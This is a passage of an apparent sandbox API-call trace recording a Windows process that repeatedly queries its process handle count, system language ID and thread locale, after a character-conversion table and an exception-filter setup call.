!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿõ\x05~Ð\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0147.753] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x41bfdb) returned 0x0 [0147.754] RtlSizeHeap (HeapHandle=0x40c0000, Flags=0x0, MemoryPointer=0x40c2ea8) returned 0x80 [0147.754] GetCurrentProcess () returned 0xffffffff [0147.754] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.754] GetSystemDefaultLangID () returned 0x2730409 [0147.755] GetThreadLocale () returned 0x409 [0147.755] GetCurrentProcess () returned 0xffffffff [0147.755] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.755] GetSystemDefaultLangID () returned 0x2730409 [0147.755] GetThreadLocale () returned 0x409 [0147.755] GetCurrentProcess () returned 0xffffffff [0147.755] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.755] GetSystemDefaultLangID () returned 0x2730409 [0147.755] GetThreadLocale () returned 0x409 [0147.755] GetCurrentProcess () returned 0xffffffff [0147.755] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.755] GetSystemDefaultLangID () returned 0x2730409 [0147.755] GetThreadLocale () returned 0x409 [0147.755] GetCurrentProcess () returned 0xffffffff [0147.755] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.755] GetSystemDefaultLangID () returned 0x2730409 [0147.755] GetThreadLocale () returned 0x409 [0147.755] GetCurrentProcess () returned 0xffffffff [0147.756] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.756] GetSystemDefaultLangID () returned 0x2730409 [0147.756] GetThreadLocale () returned 0x409 [0147.756] GetCurrentProcess () returned 0xffffffff [0147.756] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.756] GetSystemDefaultLangID () returned 0x2730409 [0147.756] GetThreadLocale () returned 0x409 [0147.756] GetCurrentProcess () returned 0xffffffff [0147.756] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.756] GetSystemDefaultLangID () returned 0x2730409 [0147.756] GetThreadLocale () returned 0x409 [0147.756] GetCurrentProcess () returned 0xffffffff [0147.756] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.756] GetSystemDefaultLangID () returned 0x2730409 [0147.756] GetThreadLocale () returned 0x409 [0147.756] GetCurrentProcess () returned 0xffffffff [0147.756] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.756] GetSystemDefaultLangID () returned 0x2730409 [0147.756] GetThreadLocale () returned 0x409 [0147.756] GetCurrentProcess () returned 0xffffffff [0147.756] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.756] GetSystemDefaultLangID () returned 0x2730409 [0147.756] GetThreadLocale () returned 0x409 [0147.756] GetCurrentProcess () returned 0xffffffff [0147.757] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.757] GetSystemDefaultLangID () returned 0x2730409 [0147.757] GetThreadLocale () returned 0x409 [0147.757] GetCurrentProcess () returned 0xffffffff [0147.757] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.757] GetSystemDefaultLangID () returned 0x2730409 [0147.757] GetThreadLocale () returned 0x409 [0147.757] GetCurrentProcess () returned 0xffffffff [0147.757] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.757] GetSystemDefaultLangID () returned 0x2730409 [0147.757] GetThreadLocale () returned 0x409 [0147.757] GetCurrentProcess () returned 0xffffffff [0147.757] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.757] GetSystemDefaultLangID () returned 0x2730409 [0147.757] GetThreadLocale () returned 0x409 [0147.757] GetCurrentProcess () returned 0xffffffff [0147.757] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.757] GetSystemDefaultLangID () returned 0x2730409 [0147.757] GetThreadLocale () returned 0x409 [0147.757] GetCurrentProcess () returned 0xffffffff [0147.757] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.758] GetSystemDefaultLangID () returned 0x2730409 [0147.758] GetThreadLocale () returned 0x409 [0147.758] GetCurrentProcess () returned 0xffffffff [0147.758] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.758] GetSystemDefaultLangID () returned 0x2730409 [0147.758] GetThreadLocale () returned 0x409 [0147.758] GetCurrentProcess () returned 0xffffffff [0147.758] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.758] GetSystemDefaultLangID () returned 0x2730409 [0147.758] GetThreadLocale () returned 0x409 [0147.758] GetCurrentProcess () returned 0xffffffff [0147.758] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.758] GetSystemDefaultLangID () returned 0x2730409 [0147.758] GetThreadLocale () returned 0x409 [0147.758] GetCurrentProcess () returned 0xffffffff [0147.758] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.758] GetSystemDefaultLangID () returned 0x2730409 [0147.758] GetThreadLocale () returned 0x409 [0147.758] GetCurrentProcess () returned 0xffffffff [0147.758] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.758] GetSystemDefaultLangID () returned 0x2730409 [0147.758] GetThreadLocale () returned 0x409 [0147.758] GetCurrentProcess () returned 0xffffffff [0147.758] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.758] GetSystemDefaultLangID () returned 0x2730409 [0147.758] GetThreadLocale () returned 0x409 [0147.758] GetCurrentProcess () returned 0xffffffff [0147.758] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.759] GetSystemDefaultLangID () returned 0x2730409 [0147.759] GetThreadLocale () returned 0x409 [0147.759] GetCurrentProcess () returned 0xffffffff [0147.759] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.759] GetSystemDefaultLangID () returned 0x2730409 [0147.759] GetThreadLocale () returned 0x409 [0147.759] GetCurrentProcess () returned 0xffffffff [0147.759] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.759] GetSystemDefaultLangID () returned 0x2730409 [0147.759] GetThreadLocale () returned 0x409 [0147.759] GetCurrentProcess () returned 0xffffffff [0147.759] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.759] GetSystemDefaultLangID () returned 0x2730409 [0147.759] GetThreadLocale () returned 0x409 [0147.759] GetCurrentProcess () returned 0xffffffff [0147.759] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.759] GetSystemDefaultLangID () returned 0x2730409 [0147.759] GetThreadLocale () returned 0x409 [0147.759] GetCurrentProcess () returned 0xffffffff [0147.759] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.759] GetSystemDefaultLangID () returned 0x2730409 [0147.759] GetThreadLocale () returned 0x409 [0147.759] GetCurrentProcess () returned 0xffffffff [0147.759] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.759] GetSystemDefaultLangID () returned 0x2730409 [0147.759] GetThreadLocale () returned 0x409 [0147.759] GetCurrentProcess () returned 0xffffffff [0147.760] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.760] GetSystemDefaultLangID () returned 0x2730409 [0147.760] GetThreadLocale () returned 0x409 [0147.760] GetCurrentProcess () returned 0xffffffff [0147.760] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.760] GetSystemDefaultLangID () returned 0x2730409 [0147.760] GetThreadLocale () returned 0x409 [0147.760] GetCurrentProcess () returned 0xffffffff [0147.760] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.760] GetSystemDefaultLangID () returned 0x2730409 [0147.760] GetThreadLocale () returned 0x409 [0147.760] GetCurrentProcess () returned 0xffffffff [0147.760] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.760] GetSystemDefaultLangID () returned 0x2730409 [0147.760] GetThreadLocale () returned 0x409 [0147.760] GetCurrentProcess () returned 0xffffffff [0147.760] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.760] GetSystemDefaultLangID () returned 0x2730409 [0147.760] GetThreadLocale () returned 0x409 [0147.760] GetCurrentProcess () returned 0xffffffff [0147.760] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.760] GetSystemDefaultLangID () returned 0x2730409 [0147.760] GetThreadLocale () returned 0x409 [0147.760] GetCurrentProcess () returned 0xffffffff [0147.760] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.760] GetSystemDefaultLangID () returned 0x2730409 [0147.760] GetThreadLocale () returned 0x409 [0147.761] GetCurrentProcess () returned 0xffffffff [0147.761] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.761] GetSystemDefaultLangID () returned 0x2730409 [0147.761] GetThreadLocale () returned 0x409 [0147.761] GetCurrentProcess () returned 0xffffffff [0147.761] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.761] GetSystemDefaultLangID () returned 0x2730409 [0147.761] GetThreadLocale () returned 0x409 [0147.761] GetCurrentProcess () returned 0xffffffff [0147.761] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.761] GetSystemDefaultLangID () returned 0x2730409 [0147.761] GetThreadLocale () returned 0x409 [0147.761] GetCurrentProcess () returned 0xffffffff [0147.761] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.761] GetSystemDefaultLangID () returned 0x2730409 [0147.761] GetThreadLocale () returned 0x409 [0147.761] GetCurrentProcess () returned 0xffffffff [0147.761] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.761] GetSystemDefaultLangID () returned 0x2730409 [0147.761] GetThreadLocale () returned 0x409 [0147.761] GetCurrentProcess () returned 0xffffffff [0147.761] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.761] GetSystemDefaultLangID () returned 0x2730409 [0147.761] GetThreadLocale () returned 0x409 [0147.761] GetCurrentProcess () returned 0xffffffff [0147.761] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.761] GetSystemDefaultLangID () returned 0x2730409 [0147.768] GetThreadLocale () returned 0x409 [0147.768] GetCurrentProcess () returned 0xffffffff [0147.768] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.768] GetSystemDefaultLangID () returned 0x2730409 [0147.768] GetThreadLocale () returned 0x409 [0147.768] GetCurrentProcess () returned 0xffffffff [0147.769] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.769] GetSystemDefaultLangID () returned 0x2730409 [0147.769] GetThreadLocale () returned 0x409 [0147.769] GetCurrentProcess () returned 0xffffffff [0147.769] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.769] GetSystemDefaultLangID () returned 0x2730409 [0147.769] GetThreadLocale () returned 0x409 [0147.769] GetCurrentProcess () returned 0xffffffff [0147.769] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.769] GetSystemDefaultLangID () returned 0x2730409 [0147.769] GetThreadLocale () returned 0x409 [0147.769] GetCurrentProcess () returned 0xffffffff [0147.769] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.769] GetSystemDefaultLangID () returned 0x2730409 [0147.769] GetThreadLocale () returned 0x409 [0147.769] GetCurrentProcess () returned 0xffffffff [0147.769] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.769] GetSystemDefaultLangID () returned 0x2730409 [0147.769] GetThreadLocale () returned 0x409 [0147.769] GetCurrentProcess () returned 0xffffffff [0147.769] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.769] GetSystemDefaultLangID () returned 0x2730409 [0147.769] GetThreadLocale () returned 0x409 [0147.770] GetCurrentProcess () returned 0xffffffff [0147.770] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.770] GetSystemDefaultLangID () returned 0x2730409 [0147.770] GetThreadLocale () returned 0x409 [0147.770] GetCurrentProcess () returned 0xffffffff [0147.770] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.770] GetSystemDefaultLangID () returned 0x2730409 [0147.770] GetThreadLocale () returned 0x409 [0147.770] GetCurrentProcess () returned 0xffffffff [0147.770] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.770] GetSystemDefaultLangID () returned 0x2730409 [0147.770] GetThreadLocale () returned 0x409 [0147.770] GetCurrentProcess () returned 0xffffffff [0147.770] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.770] GetSystemDefaultLangID () returned 0x2730409 [0147.770] GetThreadLocale () returned 0x409 [0147.770] GetCurrentProcess () returned 0xffffffff [0147.770] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.770] GetSystemDefaultLangID () returned 0x2730409 [0147.770] GetThreadLocale () returned 0x409 [0147.770] GetCurrentProcess () returned 0xffffffff [0147.770] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.770] GetSystemDefaultLangID () returned 0x2730409 [0147.770] GetThreadLocale () returned 0x409 [0147.770] GetCurrentProcess () returned 0xffffffff [0147.771] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.771] GetSystemDefaultLangID () returned 0x2730409 [0147.771] GetThreadLocale () returned 0x409 [0147.771] GetCurrentProcess () returned 0xffffffff [0147.771] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.771] GetSystemDefaultLangID () returned 0x2730409 [0147.771] GetThreadLocale () returned 0x409 [0147.771] GetCurrentProcess () returned 0xffffffff [0147.771] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.771] GetSystemDefaultLangID () returned 0x2730409 [0147.771] GetThreadLocale () returned 0x409 [0147.771] GetCurrentProcess () returned 0xffffffff [0147.771] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.771] GetSystemDefaultLangID () returned 0x2730409 [0147.771] GetThreadLocale () returned 0x409 [0147.771] GetCurrentProcess () returned 0xffffffff [0147.771] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.771] GetSystemDefaultLangID () returned 0x2730409 [0147.771] GetThreadLocale () returned 0x409 [0147.771] GetCurrentProcess () returned 0xffffffff [0147.771] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.771] GetSystemDefaultLangID () returned 0x2730409 [0147.771] GetThreadLocale () returned 0x409 [0147.771] GetCurrentProcess () returned 0xffffffff [0147.771] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.772] GetSystemDefaultLangID () returned 0x2730409 [0147.772] GetThreadLocale () returned 0x409 [0147.772] GetCurrentProcess () returned 0xffffffff [0147.772] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.772] GetSystemDefaultLangID () returned 0x2730409 [0147.772] GetThreadLocale () returned 0x409 [0147.772] GetCurrentProcess () returned 0xffffffff [0147.772] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.772] GetSystemDefaultLangID () returned 0x2730409 [0147.772] GetThreadLocale () returned 0x409 [0147.772] GetCurrentProcess () returned 0xffffffff [0147.772] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.772] GetSystemDefaultLangID () returned 0x2730409 [0147.772] GetThreadLocale () returned 0x409 [0147.772] GetCurrentProcess () returned 0xffffffff [0147.772] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.772] GetSystemDefaultLangID () returned 0x2730409 [0147.772] GetThreadLocale () returned 0x409 [0147.772] GetCurrentProcess () returned 0xffffffff [0147.772] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.772] GetSystemDefaultLangID () returned 0x2730409 [0147.772] GetThreadLocale () returned 0x409 [0147.772] GetCurrentProcess () returned 0xffffffff [0147.772] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.772] GetSystemDefaultLangID () returned 0x2730409 [0147.773] GetThreadLocale () returned 0x409 [0147.773] GetCurrentProcess () returned 0xffffffff [0147.773] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.773] GetSystemDefaultLangID () returned 0x2730409 [0147.773] GetThreadLocale () returned 0x409 [0147.773] GetCurrentProcess () returned 0xffffffff [0147.773] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.773] GetSystemDefaultLangID () returned 0x2730409 [0147.773] GetThreadLocale () returned 0x409 [0147.773] GetCurrentProcess () returned 0xffffffff [0147.773] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.773] GetSystemDefaultLangID () returned 0x2730409 [0147.773] GetThreadLocale () returned 0x409 [0147.773] GetCurrentProcess () returned 0xffffffff [0147.773] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.773] GetSystemDefaultLangID () returned 0x2730409 [0147.773] GetThreadLocale () returned 0x409 [0147.773] GetCurrentProcess () returned 0xffffffff [0147.773] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.773] GetSystemDefaultLangID () returned 0x2730409 [0147.773] GetThreadLocale () returned 0x409 [0147.773] GetCurrentProcess () returned 0xffffffff [0147.773] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.773] GetSystemDefaultLangID () returned 0x2730409 [0147.774] GetThreadLocale () returned 0x409 [0147.774] GetCurrentProcess () returned 0xffffffff [0147.774] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.774] GetSystemDefaultLangID () returned 0x2730409 [0147.774] GetThreadLocale () returned 0x409 [0147.774] GetCurrentProcess () returned 0xffffffff [0147.774] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.774] GetSystemDefaultLangID () returned 0x2730409 [0147.774] GetThreadLocale () returned 0x409 [0147.774] GetCurrentProcess () returned 0xffffffff [0147.774] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.774] GetSystemDefaultLangID () returned 0x2730409 [0147.774] GetThreadLocale () returned 0x409 [0147.774] GetCurrentProcess () returned 0xffffffff [0147.774] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.774] GetSystemDefaultLangID () returned 0x2730409 [0147.774] GetThreadLocale () returned 0x409 [0147.774] GetCurrentProcess () returned 0xffffffff [0147.774] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.774] GetSystemDefaultLangID () returned 0x2730409 [0147.774] GetThreadLocale () returned 0x409 [0147.774] GetCurrentProcess () returned 0xffffffff [0147.774] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.774] GetSystemDefaultLangID () returned 0x2730409 [0147.775] GetThreadLocale () returned 0x409 [0147.775] GetCurrentProcess () returned 0xffffffff [0147.775] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.775] GetSystemDefaultLangID () returned 0x2730409 [0147.775] GetThreadLocale () returned 0x409 [0147.775] GetCurrentProcess () returned 0xffffffff [0147.775] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.775] GetSystemDefaultLangID () returned 0x2730409 [0147.775] GetThreadLocale () returned 0x409 [0147.775] GetCurrentProcess () returned 0xffffffff [0147.775] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.775] GetSystemDefaultLangID () returned 0x2730409 [0147.775] GetThreadLocale () returned 0x409 [0147.775] GetCurrentProcess () returned 0xffffffff [0147.775] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.775] GetSystemDefaultLangID () returned 0x2730409 [0147.775] GetThreadLocale () returned 0x409 [0147.775] GetCurrentProcess () returned 0xffffffff [0147.775] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.775] GetSystemDefaultLangID () returned 0x2730409 [0147.775] GetThreadLocale () returned 0x409 [0147.775] GetCurrentProcess () returned 0xffffffff [0147.775] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.775] GetSystemDefaultLangID () returned 0x2730409 [0147.775] GetThreadLocale () returned 0x409 [0147.776] GetCurrentProcess () returned 0xffffffff [0147.776] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.776] GetSystemDefaultLangID () returned 0x2730409 [0147.776] GetThreadLocale () returned 0x409 [0147.776] GetCurrentProcess () returned 0xffffffff [0147.776] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.776] GetSystemDefaultLangID () returned 0x2730409 [0147.776] GetThreadLocale () returned 0x409 [0147.776] GetCurrentProcess () returned 0xffffffff [0147.776] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.776] GetSystemDefaultLangID () returned 0x2730409 [0147.776] GetThreadLocale () returned 0x409 [0147.776] GetCurrentProcess () returned 0xffffffff [0147.776] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.776] GetSystemDefaultLangID () returned 0x2730409 [0147.776] GetThreadLocale () returned 0x409 [0147.776] GetCurrentProcess () returned 0xffffffff [0147.776] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.776] GetSystemDefaultLangID () returned 0x2730409 [0147.776] GetThreadLocale () returned 0x409 [0147.776] GetCurrentProcess () returned 0xffffffff [0147.776] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.776] GetSystemDefaultLangID () returned 0x2730409 [0147.776] GetThreadLocale () returned 0x409 [0147.776] GetCurrentProcess () returned 0xffffffff [0147.776] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.777] GetSystemDefaultLangID () returned 0x2730409 [0147.777] GetThreadLocale () returned 0x409 [0147.777] GetCurrentProcess () returned 0xffffffff [0147.777] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.777] GetSystemDefaultLangID () returned 0x2730409 [0147.777] GetThreadLocale () returned 0x409 [0147.777] GetCurrentProcess () returned 0xffffffff [0147.777] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.777] GetSystemDefaultLangID () returned 0x2730409 [0147.777] GetThreadLocale () returned 0x409 [0147.777] GetCurrentProcess () returned 0xffffffff [0147.777] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.777] GetSystemDefaultLangID () returned 0x2730409 [0147.777] GetThreadLocale () returned 0x409 [0147.777] GetCurrentProcess () returned 0xffffffff [0147.777] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.783] GetSystemDefaultLangID () returned 0x2730409 [0147.783] GetThreadLocale () returned 0x409 [0147.783] GetCurrentProcess () returned 0xffffffff [0147.783] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.783] GetSystemDefaultLangID () returned 0x2730409 [0147.783] GetThreadLocale () returned 0x409 [0147.783] GetCurrentProcess () returned 0xffffffff [0147.783] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.783] GetSystemDefaultLangID () returned 0x2730409 [0147.783] GetThreadLocale () returned 0x409 [0147.783] GetCurrentProcess () returned 0xffffffff [0147.784] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.784] GetSystemDefaultLangID () returned 0x2730409 [0147.784] GetThreadLocale () returned 0x409 [0147.784] GetCurrentProcess () returned 0xffffffff [0147.784] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0147.784] GetSystemDefaultLangID () returned 0x2730409 [0147.784] GetThreadLocale () returned 0x409 